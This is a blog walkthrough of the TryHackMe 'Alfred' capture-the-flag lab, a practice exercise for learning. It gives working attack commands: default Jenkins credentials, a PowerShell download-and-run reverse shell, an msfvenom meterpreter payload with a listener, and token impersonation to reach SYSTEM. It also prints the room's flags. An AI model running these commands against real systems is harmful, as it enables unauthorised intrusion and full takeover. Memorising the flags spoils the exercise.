~ Alfred – Try Hack Me – Walk through

Posted on by Paradoxa

Alfred – Try Hack Me
CTF Walk through

Task 1

Target IP: 10.10.225.64

To scan the target machine we use

nmap -p- -sV -sC -oN nmap-all -Pn 10.10.225.64

[-p- to scan all ports
-sVĀ  to see the service version info
-sC script
-oN …. to output the result scan in a file (nmap-all)
-Pn treat all hosts as online (I usually to use it but this room suggested in case nmap had problem with the scan)]

we found 3 tcp ports open: 80, 3389, 8080
answer 1: 3

We visit 10.10.225.64:80 but we only find a Bruce W. picture,and nothing useful on the source code.

so we visit the 10.10.225.64:8080 and we found a log in page.
After checking the default password for the Jenkins on the search engine we discoveer that admin is the username and after trying the password with the most used we discover that it is also the password.
answer 2: admin:admin

Still on the webpage, we following the instruction we find the command line input under project/configure/build and we copy and edit the command in the command line

powershell iex (New-Object Net.WebClient).DownloadString('http://10.9.2.193:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.2.193 -Port 1223

after, we download the file Invoke-PowerShellTcp.ps1 and from the downloaded folder we open server so we can transfer the payload

sudo python3 -m http.server 80

in another terminal we open a netcat listener

nc -lvnp 1223

then go the the website interface and press build now buttons to gain the shell

Loking back at the terminal we should have the shell, now we look for the flag which is in C:\Users\bruce\Desktop; and after cat the file we get
answer 4: 79007a09481963edf2e1321abd9ae2a0

 

 

Task 2 – Switching Shells

On a new terminal paste and modify the following to create the file

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.2.193 LPORT=2323 -f exe -o shell-name.exe

then go on the attack machine and paste and adjust the code they provide

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.2.193:80/shell-name.exe','shell-name.exe')"

before execute the code we need to activate the meterpreter handle on the msfconsole (press enter after each line)

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.9.2.193
set LPORT 2323
run

After the handle listener is set, we go back to the target powershell terminal and type

Start-Process "shell-name.exe"

and we gained the shell with meterpreter

answer 5: 73802 we can see that in the msfvenom section

 

Task 3 – Priviledge Escalation

Still in meterpreter shell, Because whoami /priv doesn’t work we follow the second set of instruction and type

use incognito

after to view the token availible

list_tokens -g

to use the token

impersonate_token "BUILTIN\Administrators"

and type the following to reveal the question

getuid

answer: NT AUTHORITY\SYSTEM

now for the final answer, we need to migrate to services.exe so to see the PID number type

ps

we discover the PID wich is 668 so wr type

migrate 668

after we go the the C:\Windows\system32\config folder and cat the root.txt to obtain the flag

final answer: dff0f748678f280250f25a45b8046b4a

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *